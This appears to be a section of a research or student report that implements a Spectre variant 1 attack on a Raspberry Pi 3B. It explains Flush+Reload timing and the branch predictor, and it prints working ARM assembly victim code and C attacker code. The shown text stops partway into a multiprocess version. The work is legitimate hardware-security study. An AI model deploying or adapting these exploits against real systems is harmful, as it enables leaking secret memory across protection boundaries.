\section{Spectre Attack}

\subsection{Cache side channel}

\subsubsection{Introduction}
The extraction of information through a side channel can be performed using different architectural components. One of the most reliable and documented side channel is the cache. However, exploiting the cache as a side channel is one of the most challenging component of the attack to implement on an ARM processors, given that most of the existing works on this matter have focused on x86 processors. Moreover, ARM has made various changes to its architectures over time in order to make its products unaffected by this kind of vulnerabilities. One example could be the usage of a pseudo-random replacement policy on L1 cache that bounds eviction based attacks to be more complex than on x86 architectures in order to succeed \cite{cachearm.1}.

\subsubsection{Choose the attack}
The ARM Cortex-a53 on the Raspberry Pi 3 model B has an Harvard L1 cache, while the L2 cache is optional \cite{a53manual} and on the BCM2837 chip it is disabled by default \cite{raspbpiconfig}. Each core has a 32KiB L1 data cache with 64 byte lines. The mapping policy is 4 way set-associative with pseudo-random replacement policy within the sets. The processor also features a second level of memory that keeps the L1 cache of different cores coherent. This module is called Snoop Control Unit (SCU) \cite{snoopcu}. 
There are different categories of attacks \cite{cachearm.1} to choose from, but not all of them can be used in this case. Supposing we want to read a byte of data, the cache should have enough resources to actually implement the read operation.
The low number of sets in a single cache, together with the pseudo-random replacement policy, the absence of an L2 cache and the presence of the SCU do not allow to select any Set-only-based attacks.
The need to find a reliable attack that also complied with Cortex-a53 specifications steered us to choose an Address-only-based attack called Flush+Reload.

The main strategy of this attack is to spot differences in the access timing of different cache lines within the same page. This is well documented on x86 processors \cite{f+r}, but the code translation to ARM is not straightforward. This is especially true in our case. In fact, Flush+Reload is usually applied to the higher levels of cache because they are shared between cores and allow to avoid prefetching mechanisms to pollute the reading results thanks to their size. However, on our Cortex-a53 there is no L2 cache and, even if it was included, prefetched data are loaded directly into L1 cache. They are stored in the L2 cache only when evicted.
 Moreover, the SCU handles cache-to-cache transfers between cores through buffers, thus making timing differences caused by cross-core invalidation more difficult to spot \cite{cachearm.1}.
For all these reasons our attack takes place within a single core.

\subsubsection{Flush+Reload implementation on a Cortex-a53}
As mentioned before, the attack implementation is not easy as it may seem. There are some libraries online that can help with it, but the level of precision required for our purposes led us to write the code from scratch.

The cache lines flush is executed using \lstinline{DC CIVAC}. This instruction cleans and invalidate a line to Point of Coherency by address \cite{dccivac} \cite{poc}. It is enabled by default on our system. The instruction is closed between two barriers created using the instructions \lstinline{DSB} \cite{dsb_ref} and \lstinline{ISB} \cite{isb_ref}. The barriers force to flush the line whose address is passed through the register \lstinline{x0}. Otherwise, the operation may be delayed or even not executed. Using flags like \lstinline{-O0} during compilation did not solve the problem when executing \lstinline{DC CIVAC} without any memory barrier.

\begin{lstlisting}[language=C, caption=Flush code., label={lst:flush}]
        DSB ISH
        ISB
        DC CIVAC, X0
        DSB ISH
        ISB
\end{lstlisting}

After flushing the L1 cache, the other fundamental aspect is to reload the line we want to use to steal the secret value. In our case, this is done exploiting speculative leakage.

The next part of the Flush+Reload attack is the side channel exploit. While accessing the useful cache lines (it is not necessary to use all the cache for the attack to work) the access latency needs to be measured and stored for additional computations. The cache has to be read in the lowest possible time so the results are processed only at the end of this operation since it is more efficient to directly write an array element than comparing two values to choose which one to write. 
While it is possible to measure the access latency accurately enough at user-level using the \textit{clock\_gettime()} system call, we could not achieve a precision sufficient to our purposes. This is mainly due to the fact that our processor runs at a clock frequency too close to the one of the memory, causing cache hits and cache misses to have similar timings. Even raising the clock frequency to the recommended maximum (1.2 GHz) and fixing it so it cannot vary is not enough to get reliable timings. For this reason, we had to enable the Performance Monitor Units available on the Cortex-a53. Unfortunately, this operation cannot be performed at Exception Level 0 (EL0 or User/Application-level), so we did it through a kernel module (it runs at EL1 or Kernel-level) adapting an already existing one \cite{pmu}.
After measuring the access latency to all the useful lines we can compare them to a threshold whose value is really dependent on the system the program is being executed on. The lines that have an access time below the threshold can be considered as hits, all the others are misses. In order for the hits to be spotted correctly, the threshold does not have to be too high or too low. In the first case, we would get a lot of false positives, while in the second case, even if there has been a reload, no hit would be detected. Ideally, the attack should find only one cached line.

\subsubsection{Attempts at reading 1 byte}
\label{cacheread}After many attempts, we gave up on the possibility to read an entire byte at a time. The best we achieved is to read 6 bits and, even in this situation, we had to make some assumptions that may not yield true for other systems with the same processor. This task was especially hard because of the prefetcher and the high noise environment we had to work with. 

For the first point it is important to know that the Cortex-a53 prefetcher has a stride pattern recognition algorithm \cite{a53manual}. When it detects cache misses with a fixed stride, the prefetch is triggered. This is the reason why at some point we tried to switch from a Flush+Reload to a Flush+Flush cache attack \cite{f+f}. In fact, differently from Flush+Reload, Flush+Flush relies on the timing difference measurable when executing the x86 instruction \lstinline{clflush} on a full and on an empty line. However, through our tests, we have not found any ARMv8-a instruction that showed a similar behavior so we switched back to Flush+Reload.
Snooping the content of the CPU Auxiliary Control Register EL1, \cite{cpuacrel1} it is possible to know more prefetcher settings. In our case, the bits were at their reset value, so the maximum number of consecutive linefill to trigger the prefetch is 2. If lines are not consecutive, this is not true anymore because in this case, independently from this bit, the prefetch is triggered when three lines with a fixed stride are filled.
This behavior requires a casual access to cache lines in order not to activate the prefetch. In fact, while running the attack on a single core should avoid the cache to be polluted by other programs unwanted data, the cache can still be filled with the data we are using to perform the attack. Because casual access is difficult to realize, we opted for a pseudo-casual approach with values computed at runtime. This last aspect is really important because writing the access sequence directly into the code will result in little to no effect on our attempt to prevent cache pollution.

The simplest yet effective method we found to generate a pseudo-casual sequence of number within 0 and 255 is a hash function (see Listing \ref{lst:hashFunction}).

\begin{lstlisting}[language=C, caption=Hash function to generate pseudo-casual numbers., label={lst:hashFunction}]
    for (int i=0; i<SHUFFLE_DIM; i++){
                line[i] = ((i * base) + v) % SHUFFLE_DIM;
    }
\end{lstlisting}

While testing this approach, we discovered that, depending on the \lstinline{base} and \lstinline{v} values used, the access timing were different. After trying, without succeeding, to identify a recognizable pattern to turn the obtained timings into a function of the variables \lstinline{base} and \lstinline{v}, we choose the values that showed the best timings for our purposes.
We also tried to use the \lstinline{rand()} function found in the \lstinline{stdlib.h} library, but it seemed to interfere with the cache access latency measurements.

The other important aspect mentioned above is the high noise environment. The system we are working on is running many other procedures so it may happen that, while trying to access a cache line, an unexpected delay causes the timing read to last more than it should. To even out the effects of random noise injections into the timing readings, the adopted approach is to read the same byte multiple times, using the average timing value to decide whether it was cached or not.

After running the code, despite the different approaches that we tried not to trigger the prefetch, we got inconsistent results. One of the most obvious problems was that the hash function was generating a sequence whose pattern was still identifiable. Trying to solve this problem we changed \lstinline{base} and \lstinline{v} on each read of the same byte. This solution did not work as expected since some values were still being prefetched, even if they were not being explicitly reloaded. Even after implementing a voting mechanism that raised further the number of reads on the same byte, the problem persisted. The vote is implemented using an array that registers the lines whose access time is considered an hit. At the end of each reading cycle these lines receives +1 vote. After a certain number of voting cycles the line with more hits is considered "the winner".

Another possible solution is to focus the accesses on a cache region that contains a single memory page in order to recover the data before the entire page is cached. This method relies on the possibility that the prefetch happen only inside page boundaries. Further tests revealed that, in contrast with the previous hypothesis, the prefetch behavior in one page influences the prefetcher decisions in other pages \cite{pref&branchpr}.
Because of this, sometimes, when reloading a line, all the other cache lines whose distance is a multiple of a page size from the reloaded line are going to be cached too. For example, reloading line 1 could cause to prefetch also lines 65, 129, 193, etc. However, in our program, this happens just for specific cache lines and with specific patterns. In particular, the first 57 lines seem to be unaffected by the problem. This strange behavior does not seem to be explained by the previous theory because, in our system, each page spans 64 cache lines (4096 bytes), meaning that, after the 64th lines, the voting mechanism should fail. In fact, it is implemented so that if the lines tie during the vote, the algorithm chooses the first line registered as an hit. So, if the cache is accessed starting from the top, the lines in the first page should always win.
Since we did not find any other information that could help us, as mentioned above, the maximum we can read at once is a 6-bit word. This is possible because lines from 0 to 63 are loaded using a fixed pattern, even when the prefetcher pollutes the cache. However, since this result was achieved later in the project development, after numerous hours of testing, and it is not practical in a real life scenario, the attack was performed reading 1-bit since this solution seemed more reliable.

\subsection{Inside the Raspberry Pi 3b branch predictor}
\label{branchpredictor}The branch prediction and the poisoning of the branch predictor itself play a very important role in the Spectre attack. In order to create an actual attack on a real-world platform, a Raspberry Pi 3 model B in our case, we had to retrieve information on how the branch prediction works in an ARM Cortex-a53. Since the actual structure is not fully documented by ARM, we had to rely on papers that try to describe the branch predictor after reverse engineering part of it. As a result of our search, we were able to speculate a possible structure for the predictor, which we will show in this section, together with the implication on the Spectre code. 

As per ARM specifications, the branch predictor of a Cortex-a53 is a global type branch predictor (BP or BPU) that uses branch history registers (BHR) and a 3072-entry pattern history table (PHT). Additional sources \cite{pref&branchpr} allowed us to suppose that the 3072-entry table is actually divided in 3 PHT, each of them with a 10-bit BHR. This means that the BP is actually made of 3 gshare two-level adaptive branch predictors.
Let's show how the main components of the branch predictor works:
\begin{itemize}
    \item \textbf{Array of BHRs}: A Branch History Register is an n-bit register whose content is determined by the outcome of the last \textit{n} branches. In our architecture, we have 3 BHR on 10 bits because we supposed that each PHT has 1024 entries. In fact, since the content of a BHR is used to access the corresponding PHT, a PHT has to cover all possible values of its BHR.
    A BHR is updated when the definitive outcome of the branch is known. When doing this the value of the BHR is shifted left by one position and the bit representing the outcome is inserted as the LSb. The value of this bit depends on whether the conditional jump was taken or untaken (not taken).
    For each branch we select the corresponding register by computing the modulo 3 of its address.
    \item \textbf{Array of 3 PHTs}: As already said, we supposed the PHT is divided into 3 tables with 1024 elements each. The PHT that will be accessed is the one that corresponds to the BHR accessed before (there is a one to one correspondence between the 3 BHRs and the 3 PHTs). Since the BP is supposed to be a gshare, the entry of the PHT that will be accessed is given by the XOR between the value of the PC (so the address of the branch) and the value of the BHR. All these techniques allow for creating a strong dependence between the address of the branch and the outcome, thus reducing the impact of conflicts, that may be caused by the limited size of the BPU, on the effectiveness of the prediction.
    \item \textbf{Entry of the PHT}: each one of the 1024 entries for a PHT is a 2-bit saturating counter. These are basically FSMs. In the following description, we will suppose that its states are encoded so that the MSb of the state determines the outcome of the branch while its LSb is used to implement forms of "weakly" (un)taken or "strongly" (un)taken. 
\end{itemize}


\begin{figure}[ht]
  \centering
  \includegraphics[width=12cm]{Resources/Spectre_BPU.png}
  \caption{A possible structure for the BPU.}
  \label{fig:BPUstructure}
\end{figure}

Taking this as the possible structure for the BPU (shown in the Figure \ref{fig:BPUstructure}), let's define how to implement the mistraining. Our job is to alter the prediction on the branch inside the victim code when called with an invalid value in order to correctly change the cache state so that it is possible to retrieve secret information through the side channel. To do so, we can act directly on the BPU by taking a look at its structure, in particular at the following elements:
\begin{itemize}
    \item The address of the branch determines in a unique and precise way the BHR that will be accessed.
    \item The entry of the PHT that is accessed depends on the address of the branch (the current PC) but also on the value of the BHR that was accessed.
    \item In general, we know that the PHT entry that corresponds to the branch in the victim code varies depending on the current value of the BHR, so we have to find a way to consistently access the same entry in the PHT. In order to do so, we will force the value of the BHR to be a sequence of zeroes (zero means untaken according to our convention), and then we will force the counter to the state corresponding to the strongly untaken (00). 
\end{itemize}
Let's develop a strategy to implement the poisoning of the predictor:
\begin{itemize}
    \item In order to force an entry of the PHT to a configuration of strongly untaken, we need at least 13 training calls to the victim code. In our case, we don't care about which entry is going to be poisoned, and it will definitely depend on the address of the branch in the victim code.     
    Why do we need all these calls? The problem resides in the fact that when we start the poisoning, we don't know the exact contents of the BHR that corresponds to the critical branch, so we have to find a way to force it to a known value. The only way in which we can do that is by overwriting it completely with a known sequence, so we need the first ten calls for this purpose.  
    As we know, after the outcome of each branch is known, the BHR is shifted and the LSb updated with the outcome, so by calling 10 times the victim with valid values we are slowly filling the BHR with zeroes. After the tenth branch, the PHT entries that will be accessed next is known, and it is given by the \lstinline{XOR} between the branch address and 0000000000, which gives us the branch address itself. From this point on we just need to poison the selected entries of the PHT, and in the general case we need 3 more calls to migrate from state 11 to 00. As an important side note, when we perform these three calls we are not modifying the content of the BHR, because the branches are always untaken, so we always shift zeroes in the LSb and we remain with a sequence of 0s as before. In order for this method to succeed, we need to make sure that during the poisoning we don't evaluate branches that are mapped to the same BHR of the critical branch, otherwise we would alter the value of the BHR and the index of the PHT entry reached. This is possible only if these branches are not present in the victim and in the attacker: for the first thing we can't do much, but for the second we can simply unroll the mistraining loop so that its conditional jumps do not ruin the BHR setup.
    
    \item In theory, the previous point would be enough. However, if we take a look at the code in the following section, we can see that between the mistraining calls and the malicious call there are some Flush operations that are performed using loops (in theory they can be unrolled, however the result code would be too long and unreadable). These flushes are necessary, because we need to remove from the cache the arrays and \lstinline{array1_size} if we want the attack to work. Otherwise, the side channel readings would not yield accurate results (both page 0 and 64 of \lstinline{array2} are already cached from the previous readings). As a consequence, these branches are able to alter the values of the BHRs, and this is a problem if they are mapped to the same one of the branch inside the victim. Keeping the same value for the BHR that we had before is essential, because we need the prevision on the critical branch to be the one of the trained PHT entry when we execute the malicious code. A possible solution would be to misalign them so that we are sure that they correspond to a different BHR, but this would require a realignment every time we modify the code and if we decide to add other loops we should make sure that this applies for each one of them. More importantly, there are pieces of code, like the ones to implement libraries, whose alignment cannot be modified. To avoid these kinds of problems, we decided to insert a fragment of code used to restore the correct value of the BHR even if it was polluted. This fragment consists in 10 dummy \lstinline{BEQ} instructions that always have \textit{untaken} as outcome. This behavior is implemented by checking impossible conditions in the \lstinline{CMP} instructions before the conditional jumps so that the jump never happens. These branches are aligned thanks to some \lstinline{NOP}s used as padding in a way such that they correspond to the same BHR of the critical branch. This allows us to reconstruct the previous BHR content (000...) before accessing the victim code, so that we are sure to access the same PHT entry for which we did the training.
    
    \item In our code, we assume that the for loops in the middle (used for the flush of the data structures) cannot modify the PHT entry that is used in the training. This is a reasonable assumption, because the number of PHT entries is huge (3072) and the algorithm that we described is built so that the accesses are uniformly distributed. This means that having repeated accesses to the same PHT would be much unlikely if not forced. To further decrease the probability of events like these ones, we could insert 10 always taken branches before the flushes such that:
    \begin{itemize}
        \item the addresses of these branches are equal in modulo 3 to the one of the victim code, so that they correspond to the same BHR.
        \item they correspond to a different PHT (this is more tricky to verify because we have to follow the evolution of the BHR when ones are shifted in from the right and we have to compute the \lstinline{XOR} with the address, so it may be necessary to place them at precise addresses by inserting some padding). 
    \end{itemize}
We can now proceed to analyze the working Spectre code for the Raspberry Pi 3b. 
\end{itemize}


 \subsection{Spectre code explained}
 Thanks to the previous discussion we are now able to show the code that was used to implement the attack on the Raspberry Pi 3b. We will explain in details all the elements that are part of the code to show the ideas previously mentioned. As a side note, all the code that is reported in the following two section works as it is. Afterward, a proposal for a multiprocess implementation will be shown.

 
 \subsubsection{Victim code}
 Let's start by showing the code of the victim, which in our project was implemented initially in the same program of the attacker (like the proof of concept reported in the Spectre paper \cite{Kocher2018spectre}). Initially, we planned to write the victim in C code, however we quickly realized that some manipulation at the assembly level of instructions was needed if we wanted the code to work. This is because of some specificities of the ARM Cortex-a53 architecture.
 \begin{lstlisting}[language=C, caption=Victim code., label={lst:victim}]
.globl victimCode
.text
.type    victimCode,%function
victimCode:
	/* &array1_size goes into X0
	   array1 	goes into X1
	   array2 	goes into X2
	   m	 	goes into X3 ---> to choose the bit to read in the retrieved byte
	   x 		goes into X4 ---> standard 'apcs-gnu' not 'aapcs'*/
	// Save X4,X5 and X6 contents before using them
	STR X4,[SP,#-8]	
	STR X5,[SP,#-16]
	STR X6,[SP,#-24]
  STR X7,[SP,#-32]
	MOV X5,#0	
	MOV X6,#50
  MOV X7,#1
  LSL X7, X7, X3
	// Cortex-a53 cannot use the result of a speculative instruction in another operation
	// Value at array1+x is preloaded in order not to be executed speculatively like in the original
	LDRB W1,[X1,X4] // W1=*(array1+x)
	AND X1, X1, X7 	// To leave only a bit in X1
	LSR X1, X1, X3 // shift the value of the bit in the position of the LSb
	LSL X1, X1, #12 //we have to access the 64th line of cache in case of a 1!
	DSB ISH			// ---> Execution Barrier
	ISB
	LDR X5,[X0] 	//array_size is not in cache, long instruction

	CMP X4,X5
	BGE wrong_x 	// If(x<array_size) jump to wrong_x --> this is the branch that we have to train
	LDRB W2,[X2,X1]	// Load into X2 the content at array [(array1+x)*LINE_DISTANCE]

wrong_x:
	LDR X7,[SP,#-32]
	LDR X6,[SP,#-24]
	LDR X5,[SP,#-16]
	LDR X4,[SP,#-8]
	RET
\end{lstlisting}
Let's show in details the various parts in the code to explain their functions:

\begin{itemize}
    \item \textbf{Lines from 11 to 14}: the store instructions are used to preserve the value of registers which are callee saved. We have to underline that the ABI used in ARMv8 is not the standard one (AAPCS), but we still decided to save on the stack the values of the registers from R4 on to guarantee compatibility with other ARM versions.
    
    \item \textbf{Lines from 15 to 18}: to prepare the mask that we will use during the process of extracting the value of the selected bit from the byte \lstinline{array1[x]}.
    
    \item \textbf{Lines from 21 to 24}: the actual read of the byte array1[x] plus the selection of the bit specified by means of the input m. As we know, we have to anticipate the read of this value because ARM is unable to perform two levels of speculation. This kind of modification of the code seems forced, but if the code of the victim is relatively simple it can be performed by the compiler as part of static rescheduling optimization. In particular, in our code the value of R1 is not used anymore after the if (which corresponds to lines 30-31), so the compiler could move the \lstinline{LDRB W1,[X1,X4]} where it is now to increase the instruction level parallelism, thus limiting the duration of the stall caused by the data dependency between the \lstinline{LDRB W1,[X1,X4]} and the \lstinline{LDRB W2,[X2,X1]}. As said before, this is possible because even if we take the branch the value of \lstinline{R1} is no more accessed after the \lstinline{if}, so a modification doesn't invalidate the logic of the code.
    
    \item \textbf{Lines 25-26} : an instruction barrier that was inserted to make sure that the \lstinline{LDRB} terminates before evaluating the condition of the if. This is useful because we want the memory to be accessed very quickly when speculating the if with an x out of range, otherwise the speculation may resolve before the write in cache terminates. As we know the speculation consists in the read of \lstinline{array2[array1[x]*LINE_DISTANCE]}, so if we make sure that \lstinline{array1[x]} reading terminates before the speculation we are reducing the time required to read \lstinline{array2]}. In a real context this barrier can be replaced by another piece of code that is long enough to guarantee what we said before.
    
    \item \textbf{Lines 27 to 31}: the actual Spectre exploitation. In this fragment we start by retrieving the value of \lstinline{array_size} which \textit{must not} be in cache, because if it was it would not be possible to obtain a speculation phase long enough to allow for the write in cache of the desired value in \lstinline{array2}. Then we execute the \lstinline{CMP} to check \lstinline{if (x < array_size)}: this is the comparison whose length affects directly the duration of the speculation, and in order to make sure it is longer we uncached \lstinline{array_size} as specified in the section before. After the \lstinline{CMP} there is the branch taken if we have a value for x that is out of bounds and the actual body of the if, in which we read the value of \lstinline{array2[array1[x]*LINE_DISTANCE]} based on the value of \lstinline{array1[x]} that we read before the speculation.

    \item  \textbf{Lines from 33 to 37}: to restore the contents of the callee saved registers modified during the execution of the routine and to return to the caller.
\end{itemize}

As we have shown, there is the need for the victim to exhibit a certain structure of the code if we want the attack to work, this is because all the specificities of the ARM architectures that are not present in the Intel ones (as reported in \cite{spectreARM}). This affects the portability of the code and also the efficiency, but on the other side it allows for better protection against these kinds of attacks. 
\subsubsection{Attacker code}
Let's continue by showing the attacker code, which is the real core of the attack. We have prepared two versions of this code, and we will start by showing the one of the single-process attack (as we did for the victim):
\begin{lstlisting}[language=C, caption=Attacker code., label={lst:attacker}]
//#pragma GCC push_options
//#pragma GCC optimize ("O0")
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <stdint.h>
#include "armpmu_lib.h"
#include <unistd.h>

#define OOB_READ 200				// Number of byte read
#define ARRAY_SIZE 31			// Array1 size
#define FAKE_SIZE 13
#define SAME_BIT_CYCLES 10		// Number of reading tries on the same byte
#define CACHE_LINES 128
#define N_OF_BITS 8 			//number of bits in a byte
#define LATENCY_THRESHOLD	60
#define SB 13					// Start Byte from array1 for the out of bound read
#define LINE_DISTANCE 64*64
#define ARRAY2_SIZE 256*64

extern void victimCode(int* array1_size,char* array1,char* array2,long int junk,int x);
extern long int Flush(long int line);

// Victim variables
char array1[]="0123456789012secretStringArray1";
char s[]="S3CRET5TR0NGs";
char array2[ARRAY2_SIZE];
int array1_size = FAKE_SIZE;

// Attacker variables
int x;

int junk; // Used when reading cache latency, and also when passing the bit number to the victim

// Variable for byte read from cache side channel
uint32_t start,end;
//int temp=0; // Not to optimize the access to array2 during cache timing read
uint32_t timings[OOB_READ][N_OF_BITS][2]; // first index to scan reads of different bytes, second one to scan the single byte and find a bit, the third one for the value of the timing for the single bit
char byte_read,bit_read;

// Just indexes
int i,j,k,m,l;

// Cache timings file
FILE* fout;

int main(void){

	// Timing matrix initialization
	for(i=0;i<OOB_READ;i++){
		for(j=0;j<N_OF_BITS;j++){
			timings[i][j][0]=0;
            timings[i][j][1]=0;
        }
    }

	// Byte read
	for(i=0,x=SB;i<OOB_READ;i++,x++){ //to scan over different reads
		byte_read=0;

		for(m=0;m<N_OF_BITS;m++){ // to read a single byte one bit at a time
		// SAME_BYTE_CYCLES tries for each byte

  		    for(j=0;j<SAME_BIT_CYCLES;j++){ // to reread the bit multiple times, just to be safe
			// Mistraining

				      victimCode(&array1_size, array1, array2, m, 0);
              victimCode(&array1_size, array1, array2, m, 1);
	            victimCode(&array1_size, array1, array2, m, 2);
	            victimCode(&array1_size, array1, array2, m, 3);
	            victimCode(&array1_size, array1, array2, m, 4);
	            victimCode(&array1_size, array1, array2, m, 5);
	            victimCode(&array1_size, array1, array2, m, 6);
	            victimCode(&array1_size, array1, array2, m, 7);
	            victimCode(&array1_size, array1, array2, m, 8);
	            victimCode(&array1_size, array1, array2, m, 9);
	            victimCode(&array1_size, array1, array2, m, 10);
	            victimCode(&array1_size, array1, array2, m, 11);
	            victimCode(&array1_size, array1, array2, m, 12);

                // Flush
			       for(k=0;k<ARRAY2_SIZE;k++)
                Flush(&array2[k]);

			       for(k=0;k<ARRAY_SIZE;k++)
                Flush(&array1[k]);

             for(k=0;k<OOB_READ;k++)
                 for(l=0;l<N_OF_BITS;l++){
                     Flush(&timings[k][l][0]);
                     Flush(&timings[k][l][1]);
                 }

    			   Flush(&array1_size);
    			   asm volatile( 	"nop				\t\n");
             asm volatile( 	"nop				\t\n");
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );
             asm volatile(	"cmn sp,#0			\t\n"
                            "beq 8			 	\t\n"
                            "nop				\t\n" );

		// Call using malicious x
        	    victimCode(&array1_size, array1, array2, m, x);

            	for(k=0;k<2;k++){
                    // Non-cached read
                    junk=k*LINE_DISTANCE; //64 is the size of a cache line
                    start=rdtsc32();
                    junk &= array2[junk];
                    end=rdtsc32();
                    timings[i][m][k]+=end-start;
                }
            }

  			// Avg timing for each cache line read
            for(k=0;k<2;k++){
	  	  	    timings[i][m][k]/=SAME_BIT_CYCLES;
              if(timings[i][m][1]<LATENCY_THRESHOLD){		// If bit=0 the value is already set since byte_read is initialized to 0
					       bit_read = 0x1 << m;
					       byte_read |= bit_read;
              }
            }
        }
        printf("%c",byte_read);
    }
    printf("\n");

  	return 0;
}

//#pragma GCC pop_options
\end{lstlisting}

Let's show the parts of the code that are involved in the attack:

\begin{itemize}
    \item \textbf{Lines from 1 to 19 (defines and global variables)}: among the libraries there is \lstinline{armpmu_lib.h}. This is the one that we used to call a function to access the PMU registers. This was needed together with the kernel module that we wrote because by the default settings of Raspbian the access to PMU is not allowed in thread mode. The constants are either for representing characteristics of the architecture (for example the size of a cache line or the number of those lines) or for the sizes of data structures used in the code. Initially we considered array2 to be sized as half of the L1 cache (256*64 B) but, for the reasons explained before (\ref{cacheread}), we were able to use only two lines because we managed to read only one bit per iteration. The \lstinline{FAKE_SIZE} is the size that is "seen" from the attacker, so it corresponds to the one that is passed as a parameter to the \lstinline{victimCode} function (we will show afterward how it is done).
    
    \item \textbf{Lines from 25 to 46}: here we declare the variables and arrays that are used as part of the Spectre attack. Among these we have \lstinline{array1} and \lstinline{array2} that are the ones whose role is explained in the theoretical description of the attack, s which is a string that we can read going out of bounds starting from \lstinline{array1} and \lstinline{array1_size} is the variables used to store the \lstinline{FAKE_SIZE} that is seen from the attacker. Why do we need this variable? The reason is that we need the \lstinline{array1_size} to not be cached when the victim code is called, so that the speculation lasts longer. In order to uncache the variable we simply flush it from the cache in the attacker, then we call the victim passing this variable \textit{by reference} (in a passage by value we would cache it).
    
    \item \textbf{Line 58}: here we declare the first for loop, used to scan the bytes in memory until we reach the number of bytes given by \lstinline{OOB_READ}. The actual idea is to read all the memory of the process byte by byte, but we actually performed a read only on a small number of data.
    
    \item \textbf{Line 61}: the for loop to read one by one all the bits that are part of each byte.
    
    \item \textbf{Line 64}: the for loop to read multiple times the same bit, which is useful in case of unpredicted noise on the timings measurements. This is due to many reasons (memory chip busy doing other things, cache line that gives us the information on the \lstinline{array2} value removed from cache for storing other variables...), so it is better to take it into account when implementing the attack.
    
    \item \textbf{Lines from 67 to 79}: here we call the \lstinline{victimCode} 13 times with valid values to perform the mistraining of the branch in the \lstinline{victimCode}. We already explained in details why we need at least 13 calls and why we can't put them inside a loop (\ref{branchpredictor}).
    
    \item \textbf{Lines from 82 to 94}: to perform the flush from the cache of the elements that are used in the code. Among these elements it is important to flush \lstinline{array2} and \lstinline{array1_size}: the first one to have in cache just the value cached by the victim after performing the malicious call in order for the attacker to determine the value out of bounds, the second one for the reasons that we explained before.
    
    \item \textbf{Lines from 95 to 126}: the realignment of the value in the BHR that has been explained in section \ref{branchpredictor}. In order to perform it we can rely on ten "fake branches" that are always untaken. This code will work only if the BHR entry that we are manipulating is actually the same one that corresponds to the branches, and we can guarantee that only by realigning the code by using some padding nop instructions. The number of nops added at the beginning (lines 95-96) has been determined by checking the objdump of the code to determine the distance in modulo 3 between the location of the branches and the location of the branch in the victim code. Obviously this computation has to be done every time when there is the possibility for a change in the address of the \lstinline{victimCode} subroutine, otherwise the code would be unaligned. Because of this issue, every time we modify the code we have to determine the number of nops. Unfortunately but we didn't find a better solution for this problem.
    According to our explanation of the BP the code should not work if the conditional jumps used to setup the BHR before executing the malicious call to the victim are not aligned to the victim branch. However this is not true. The attack works even if the modulo 3 of their address is not the same of the victim one. The only measurable side effect is a slightly worse error rate in the cache reads. The speculative access is still being executed most of the times but the returned byte is sometimes wrong, meaning that there has been a problem in the speculative access of at least one bit. This results show that there are still some fundamental aspects we do not know about the branch prediction.  
    
    \item \textbf{Line 129}: the actual malicious call to the victim. It is done using \lstinline{x} as index of \lstinline{array1}.
    
    \item \textbf{Lines from 131 to 139}: to perform the timing analysis on the entries of \lstinline{array2}. As we know \lstinline{array2} is cached in blocks of 64 bytes (size of a line of cache), but the situation is actually even worse because of the aggressive prefetching. As we explained in the section about the cache, we decided to perform the read over just 1 bit at a time and we separated the line used to represent the 0 and the one used to represent the 1 by 64 positions. In particular, when the bit \lstinline{m} of \lstinline{array1[x]} is equal to 0 the victim will access line 0, while when it is 1 it will access line 64. To perform the analysis we need to check these 2 lines, and this can be done by measuring the time taken to access \lstinline{array2[0]} and \lstinline{array2[64*64]}. The measurements were done by relying on the values read from the performance counters which we are able to access by using the function \lstinline{rdtsc32()}, that is basically an assembly snippet with an \lstinline{MSR} instruction.
    
    \item \textbf{Lines from 142 to 147}: we compute the average of the timing measurements for all the iterations in which we read the same bit. In this way we can determine the value of the bit over a certain number of attempts, thus reducing the effect of statistical noise on the single measurements.
\end{itemize}
\subsubsection{Multiprocess attack}
After assessing the correct functioning of the single process attack, we decided to generalize it by implementing it using two different processes for the victim and the attacker. Unfortunately, because of some limitations of the CPU we were not able to implement a fully generalized attack able to work in a multiprocessor environment. As already said, this is caused by the impossibility to use an high level cache shared between cores. We have still been able to implement a multiprocessor attack, but we had to bind the processes to a particular core to make sure that they used the same L1 cache. The following implementation relies on this principle, and we proved that the cache read works successfully, exactly as in the code above. In this case the problem seems to be the speculation. In fact we tried to read different data using the cache attack and the code works up to the point in which we start reading data in a speculative way (so it works for the elements of array1 that corresponds to indexes which are less than \lstinline{FAKE_SIZE}). Unfortunately we were not able to discern the cause of this issue, which may be caused by a number of different elements that are not under our control. For example there is the possibility that during a context switch (which is required when we pass from the victim to the attacker and vice versa) the PHT in the BPU is flushed, thus invalidating the training done in the attacker.
Let's try to explain the idea behind the code anyway, underlining the flow of the attack and then commenting the single lines of code:

\begin{itemize}
    \item Initially we have just one process, from which we create another one by using a fork system call.
    \item Before the actual system call we create two pipes that will be used as semaphores to implement a form of synchronization between victim and attacker. In particular we want the victim to be exactly like a "function" that is explicitly called by the attacker when it needs it.
    \item There is also the need to create a shared memory region in which we will place array2 (which must be shared between victim and attacker) and the parameters which must be passed from the attacker to the victimCode called by the victim.
    \item The beginning of the victim code is used to rewrite the content of array1, so that now they are not accessible to the attacker.
    \item The remaining part of the victim consists simply in the code used for synchronizing, plus a call to victimCode, which is exactly the same function as in the single process implementation.
    \item The attacker performs the same actions that we saw in the attack before, with the only difference consisting in the fact that the call to victim code is not explicit now because it is hidden by the synchronization mechanism.
\end{itemize}
\begin{lstlisting}[language=C, caption=Multiprocess code., label={lst:multiprocess}]
#pragma GCC push_options
#pragma GCC optimize ("O0")
#define _GNU_SOURCE
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/mman.h>
#include "armpmu_lib.h"
#include <semaphore.h>
#include <unistd.h>
#include <sys/types.h>
#include <sched.h>
#include <string.h>

